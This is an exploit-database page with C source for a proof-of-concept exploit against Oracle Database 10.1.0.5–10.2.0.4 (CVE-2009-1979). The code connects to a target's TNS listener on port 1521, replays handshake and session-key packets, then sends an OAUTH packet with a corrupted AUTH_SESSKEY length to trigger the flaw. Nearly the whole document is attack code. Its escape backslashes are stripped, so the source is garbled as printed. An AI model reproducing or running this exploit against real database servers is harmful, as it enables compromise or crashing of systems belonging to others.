[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Oracle Database 10.1.0.5 - 10.2.0.4 AUTH_SESSKEY length validation exploit
# Published : 2009-10-30
# Author : Dennis Yurichev
# Previous Title : Apple Quicktime RTSP 10.4.0 - 10.5.0 Content-Type Overflow (OS X)
# Next Title : mDNSResponder 10.4.0, 10.4.8 UPnP Location Overflow (OS X)
#include <winsock2.h>
#include <stdio.h>
#include <string.h>
#include <windows.h>
#include <assert.h>
#include <string>
void s_send (SOCKET s, char *msg, DWORD size)
{
int sent;
printf ("s_send: begin: %d bytesn", size);
sent=send (s, (char*)msg, size, 0);
if (sent==SOCKET_ERROR)
{
printf ("send() -> SOCKET_ERROR, WSAGetLastError=%dn", WSAGetLastError());
} else
if (sent!=size)
printf ("sent only %d bytesn", sent);
printf ("s_send: endn");
};
void s_recv (SOCKET s)
{
char buf[20000];
int r;
struct timeval t;
fd_set fd;
t.tv_sec=0;
t.tv_usec=100000; // 100 ms
printf ("s_recv: beginn");
FD_ZERO(&fd);
FD_SET(s, &fd);
if (select (0, &fd, 0, 0, &t))
// if (select (0, &fd, 0, 0, NULL))
{
r=recv (s, buf, 20000, 0);
if (r!=0 && r!=-1)
{
printf ("got %d bytesn", r);
}
else
{
printf ("connection lost, r=%dn", r);
};
}
else
{
printf ("select() returns zeron");
};
};
unsigned char NSPTCN[]=
{
0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,
0x01, 0x3A, 0x01, 0x2C, 0x00, 0x41, 0x20, 0x00,
0x7F, 0xFF, 0xC6, 0x0E, 0x00, 0x00, 0x01, 0x00,
0x00, 0x00, 0x00, 0x3A, 0x00, 0x00, 0x02, 0x00,
//^^ ^^ cmd len
0x61, 0x61, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00
};
#define NSPTCN_HEADER_LEN 58
unsigned char NSPTDA[]=
{
0x00, 0x00, 0x00, 0x00, 0x06, 0x00, 0x00, 0x00,
// ^^ ^^ packet len
0x00, 0x00
};
#define NSPTDA_HEADER_LEN 10
void s_send_NSPTDA (SOCKET s, char *msg, int size)
{
char * buf;
int sz=size + NSPTDA_HEADER_LEN;
buf=(char*)malloc (sz);
NSPTDA[0]=( sz ) >> 8;
NSPTDA[1]=( sz ) & 0xFF;
memcpy (buf, NSPTDA, NSPTDA_HEADER_LEN);
memcpy (buf + NSPTDA_HEADER_LEN, msg, size);
printf ("s_send_NSPTDA: sending %d bytes...n", sz);
s_send (s, (char*)buf, sz);
free (buf);
};
void s_send_TNS_command (SOCKET s, const char *cmd)
{
unsigned char * pkt;
int cmd_len=strlen (cmd);
printf ("sending [%s]n", cmd);
printf ("len: %dn", cmd_len);
if (cmd_len<231)
{
int str_len=strlen(cmd);
int pkt_len=str_len+58;
pkt=(unsigned char*)malloc (str_len+58);
memcpy (pkt,
"x00x00x00x00x01x00x00x00"
// plenH, plenL
"x01x3Ax01x2Cx00x41x20x00"
"x7FxFFxC6x0Ex00x00x01x00"
"x00x00x00x3Ax00x00x02x00"
// cmdlenH cmdlenL
"x61x61x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00"
"x00x00", 58);
memcpy (pkt+58, cmd, str_len);
pkt[1]=pkt_len&0xFF;
pkt[0]=(pkt_len>>8)&0xFF;
pkt[25]=str_len&0xFF;
pkt[24]=(str_len>>8)&0xFF;
s_send (s, (char*)pkt, pkt_len);
free (pkt);
}
else
{
// something should be modified here in NSPTCN
assert (0);
};
};
bool try_host (char * h)
{
struct hostent *hp;
WSADATA wsaData;
struct sockaddr_in sin;
int r;
struct timeval t;
fd_set fd;
SOCKET s;
char pkt1318[1318];
WSAStartup(MAKEWORD(1, 1), &wsaData);
hp=gethostbyname (h);
assert (hp!=NULL);
s=socket (AF_INET, SOCK_STREAM, IPPROTO_TCP);
assert (s!=INVALID_SOCKET);
{
u_long on=1;
assert (ioctlsocket(s, FIONBIO, &on) != -1);
};
sin.sin_family=AF_INET;
sin.sin_port=htons(1521);
memcpy(&sin.sin_addr, hp->h_addr, hp->h_length);
r=connect(s, (struct sockaddr *)&sin, sizeof(sin));
t.tv_sec=3;
t.tv_usec=0;
FD_ZERO(&fd);
FD_SET(s, &fd);
if (select (0, 0, &fd, 0, &t))
{
printf ("connected to %sn", h);
s_send_TNS_command (s, "(DESCRIPTION=(CONNECT_DATA=(SERVICE_NAME=orcl)(CID=(PROGRAM=client.exe)(HOST=client_host)(USER=dennis)))(ADDRESS=(PROTOCOL=TCP)(HOST=192.168.0.115)(PORT=1521)))");
// waiting for NSPTRS
s_recv(s);
s_send_TNS_command (s, "(DESCRIPTION=(CONNECT_DATA=(SERVICE_NAME=orcl)(CID=(PROGRAM=client.exe)(HOST=client_host)(USER=dennis)))(ADDRESS=(PROTOCOL=TCP)(HOST=192.168.0.115)(PORT=1521)))");
// waiting for NSPTAC
s_recv(s);
// send NA packet
s_send (s,
"x00x9Cx00x00x06x00x00x00x00x00xDExADxBExEFx00x92"
"x0Bx10x06x00x00x04x00x00x04x00x03x00x00x00x00x00"
"x04x00x05x0Bx10x06x00x00x08x00x01x00x00x0AxF8x71"
"xC2x6CxE1x00x12x00x01xDExADxBExEFx00x03x00x00x00"
"x04x00x04x00x01x00x01x00x02x00x01x00x03x00x00x00"
"x00x00x04x00x05x0Bx10x06x00x00x02x00x03xE0xE1x00"
"x02x00x06xFCxFFx00x02x00x02x00x00x00x00x00x04x00"
"x05x0Bx10x06x00x00x0Cx00x01x00x11x06x10x0Cx0Fx0A"
"x0Bx08x02x01x03x00x03x00x02x00x00x00x00x00x04x00"
"x05x0Bx10x06x00x00x03x00x01x00x03x01"
,156);
s_recv (s);
// send TTIPRO
s_send (s,
"x00x25x00x00x06x00x00x00x00x00x01x06x05x04x03x02"
"x01x00x49x42x4Dx50x43x2Fx57x49x4Ex5Fx4Ex54x2Dx38"
"x2Ex31x2Ex30x00"
, 37);
s_recv (s);
// send TTIDTY
s_send (s,
"x00x4Bx00x00x06x00x00x00x00x00x02xB2x00xB2x00xD2"
"x25x06x01x01x01x0Dx01x01x05x01x01x01x01x01x01x01"
"x7FxFFx03x09x03x03x01x00x7Fx01x1FxFFx01x03x01x01"
"x3Fx01x01x05x00x01x07x02x01x00x00x18x00x01x80x00"
"x00x00x3Cx3Cx3Cx80x00x00x00xD0x07"
, 75);
s_recv (s);
// call OSESSKEY
s_send (s,
"x00xDAx00x00x06x00x00x00x00x00x03x76x02xFExFFxFF"
"xFFx05x00x00x00x01x00x00x00xFExFFxFFxFFx05x00x00"
"x00xFExFFxFFxFFxFExFFxFFxFFx05x73x63x6Fx74x74x0D"
"x00x00x00x0Dx41x55x54x48x5Fx54x45x52x4Dx49x4Ex41"
"x4Cx05x00x00x00x05x55x4Ex49x54x31x00x00x00x00x0F"
"x00x00x00x0Fx41x55x54x48x5Fx50x52x4Fx47x52x41x4D"
"x5Fx4Ex4Dx0Ax00x00x00x0Ax70x79x74x68x6Fx6Ex2Ex65"
"x78x65x00x00x00x00x0Cx00x00x00x0Cx41x55x54x48x5F"
"x4Dx41x43x48x49x4Ex45x0Fx00x00x00x0Fx57x4Fx52x4B"
"x47x52x4Fx55x50x5Cx55x4Ex49x54x31x00x00x00x00x08"
"x00x00x00x08x41x55x54x48x5Fx50x49x44x09x00x00x00"
"x09x32x38x30x38x3Ax34x30x30x34x00x00x00x00x08x00"
"x00x00x08x41x55x54x48x5Fx53x49x44x06x00x00x00x06"
"x64x65x6Ex6Ex69x73x00x00x00x00"
, 218);
// call OAUTH
memcpy (pkt1318,
"x05x26x00x00x06x00x00x00x00x00x03x73x03xFExFFxFF"
"xFFx05x00x00x00x01x01x00x00xFExFFxFFxFFx12x00x00"
"x00xFExFFxFFxFFxFExFFxFFxFFx05x73x63x6Fx74x74x0C"
"x00x00x00x0Cx41x55x54x48x5Fx53x45x53x53x4Bx45x59"
"x40x00x00x00x40x36x33x41x45x31x36x41x30x44x31x41"
"x46x31x45x39x33x37x41x44x36x36x46x34x46x31x35x36"
"x37x31x30x33x30x34x46x36x36x30x31x44x30x45x33x35"
"x34x37x46x42x46x39x35x34x39x37x34x32x33x30x42x43"
"x30x36x45x34x30x01x00x00x00x0Dx00x00x00x0Dx41x55"
"x54x48x5Fx50x41x53x53x57x4Fx52x44x40x00x00x00x40"
"x36x31x37x35x31x42x45x35x34x37x31x30x44x45x41x46"
"x38x46x42x33x34x32x45x36x32x41x45x35x30x45x44x38"
"x45x43x38x30x39x33x31x44x33x44x45x34x42x33x41x37"
"x34x35x38x37x45x36x46x32x36x46x37x45x45x30x34x34"
"x00x00x00x00x08x00x00x00x08x41x55x54x48x5Fx52x54"
"x54x05x00x00x00x05x32x38x30x32x38x00x00x00x00x0D"
"x00x00x00x0Dx41x55x54x48x5Fx43x4Cx4Ex54x5Fx4Dx45"
"x4Dx04x00x00x00x04x34x30x39x36x00x00x00x00x0Dx00"
"x00x00x0Dx41x55x54x48x5Fx54x45x52x4Dx49x4Ex41x4C"
"x05x00x00x00x05x55x4Ex49x54x31x00x00x00x00x0Fx00"
"x00x00x0Fx41x55x54x48x5Fx50x52x4Fx47x52x41x4Dx5F"
"x4Ex4Dx0Ax00x00x00x0Ax70x79x74x68x6Fx6Ex2Ex65x78"
"x65x00x00x00x00x0Cx00x00x00x0Cx41x55x54x48x5Fx4D"
"x41x43x48x49x4Ex45x0Fx00x00x00x0Fx57x4Fx52x4Bx47"
"x52x4Fx55x50x5Cx55x4Ex49x54x31x00x00x00x00x08x00"
"x00x00x08x41x55x54x48x5Fx50x49x44x09x00x00x00x09"
"x32x38x30x38x3Ax34x30x30x34x00x00x00x00x08x00x00"
"x00x08x41x55x54x48x5Fx53x49x44x06x00x00x00x06x64"
"x65x6Ex6Ex69x73x00x00x00x00x16x00x00x00x16x53x45"
"x53x53x49x4Fx4Ex5Fx43x4Cx49x45x4Ex54x5Fx43x48x41"
"x52x53x45x54x03x00x00x00x03x31x37x38x00x00x00x00"
"x17x00x00x00x17x53x45x53x53x49x4Fx4Ex5Fx43x4Cx49"
"x45x4Ex54x5Fx4Cx49x42x5Fx54x59x50x45x01x00x00x00"
"x01x31x00x00x00x00x1Ax00x00x00x1Ax53x45x53x53x49"
"x4Fx4Ex5Fx43x4Cx49x45x4Ex54x5Fx44x52x49x56x45x52"
"x5Fx4Ex41x4Dx45x0Ex00x00x00x0Ex63x78x5Fx4Fx72x61"
"x63x6Cx65x2Dx34x2Ex34x20x00x00x00x00x16x00x00x00"
"x16x53x45x53x53x49x4Fx4Ex5Fx43x4Cx49x45x4Ex54x5F"
"x56x45x52x53x49x4Fx4Ex09x00x00x00x09x31x38x35x35"
"x39x39x34x38x38x00x00x00x00x16x00x00x00x16x53x45"
"x53x53x49x4Fx4Ex5Fx43x4Cx49x45x4Ex54x5Fx4Cx4Fx42"
"x41x54x54x52x01x00x00x00x01x31x00x00x00x00x08x00"
"x00x00x08x41x55x54x48x5Fx41x43x4Cx04x00x00x00x04"
"x34x34x30x30x00x00x00x00x12x00x00x00x12x41x55x54"
"x48x5Fx41x4Cx54x45x52x5Fx53x45x53x53x49x4Fx4ExE9"
"x01x00x00xFExFFx41x4Cx54x45x52x20x53x45x53x53x49"
"x4Fx4Ex20x53x45x54x20x4Ex4Cx53x5Fx4Cx41x4Ex47x55"
"x41x47x45x3Dx20x27x41x4Dx45x52x49x43x41x4Ex27x20"
"x4Ex4Cx53x5Fx54x45x52x52x49x54x4Fx52x59x3Dx20x27"
"x41x4Dx45x52x49x43x41x27x20x4Ex4Cx53x5Fx43x55x52"
"x52x45x4Ex43x59x3Dx20x27x24x27x20x4Ex4Cx53x5Fx49"
"x53x4Fx5Fx43x55x52x52x45x4Ex43x59x3Dx20x27x41x4D"
"x45x52x49x43x41x27x20x4Ex4Cx53x5Fx4Ex55x4Dx45x52"
"x49x43x5Fx43x48x41x52x41x43x54x45x52x53x3Dx20x27"
"x2Ex2Cx27x20x4Ex4Cx53x5Fx43x41x4Cx45x4Ex44x41x52"
"x3Dx20x27x47x52x45x47x4Fx52x49x41x4Ex27x20x4Ex4C"
"x53x5Fx44x41x54x45x5Fx46x4Fx52x4Dx41x54x3Dx20x27"
"x44x44x2Dx4Dx4Fx4Ex2Dx52x52x27x20x4Ex4Cx53x5Fx44"
"x41x54x45x5Fx4Cx41x4Ex47x55x41x47x45x3Dx20x27x41"
"x4Dx45x52x49x43x41x4Ex27x20x4Ex4Cx53x5Fx53x4Fx52"
"x54x3Dx20x27x42x49x4Ex41x52x59x27x20x54x49x4Dx45"
"x5Fx5Ax4Fx4ExEAx45x3Dx20x27x2Bx30x33x3Ax30x30x27"
"x20x4Ex4Cx53x5Fx43x4Fx4Dx50x3Dx20x27x42x49x4Ex41"
"x52x59x27x20x4Ex4Cx53x5Fx44x55x41x4Cx5Fx43x55x52"
"x52x45x4Ex43x59x3Dx20x27x24x27x20x4Ex4Cx53x5Fx54"
"x49x4Dx45x5Fx46x4Fx52x4Dx41x54x3Dx20x27x48x48x2E"
"x4Dx49x2Ex53x53x58x46x46x20x41x4Dx27x20x4Ex4Cx53"
"x5Fx54x49x4Dx45x53x54x41x4Dx50x5Fx46x4Fx52x4Dx41"
"x54x3Dx20x27x44x44x2Dx4Dx4Fx4Ex2Dx52x52x20x48x48"
"x2Ex4Dx49x2Ex53x53x58x46x46x20x41x4Dx27x20x4Ex4C"
"x53x5Fx54x49x4Dx45x5Fx54x5Ax5Fx46x4Fx52x4Dx41x54"
"x3Dx20x27x48x48x2Ex4Dx49x2Ex53x53x58x46x46x20x41"
"x4Dx20x54x5Ax52x27x20x4Ex4Cx53x5Fx54x49x4Dx45x53"
"x54x41x4Dx50x5Fx54x5Ax5Fx46x4Fx52x4Dx41x54x3Dx20"
"x27x44x44x2Dx4Dx4Fx4Ex2Dx52x52x20x48x48x2Ex4Dx49"
"x2Ex53x53x58x46x46x20x41x4Dx20x54x5Ax52x27x00x00"
"x00x00x00x00x17x00x00x00x17x41x55x54x48x5Fx4Cx4F"
"x47x49x43x41x4Cx5Fx53x45x53x53x49x4Fx4Ex5Fx49x44"
"x20x00x00x00x20x35x44x46x34x37x43x45x35x42x38x42"
"x32x34x43x46x38x42x46x42x36x46x30x46x36x39x32x42"
"x38x46x42x39x38x00x00x00x00x10x00x00x00x10x41x55"
"x54x48x5Fx46x41x49x4Cx4Fx56x45x52x5Fx49x44x00x00"
"x00x00x00x00x00x00"
,1318);
pkt1318[0x41]=0x80;
s_send (s, pkt1318, 1318);
assert (closesocket (s)==0);
return true;
}
else
{
printf ("while connect(): select() returns zeron");
assert (closesocket (s)==0);
return false;
};
};
void main(int argc, char * argv[])
{
printf ("CVE-2009-1979 PoC. Working at least on 10.2.0.4 win32n");
printf ("Vulnerability discovered by Dennis Yurichev <dennis@conus.info> http://blogs.conus.infon");
if (argv[1]==NULL)
{
printf ("use: %s <hostname>n", argv[0]);
return;
};
try_host (argv[1]);
};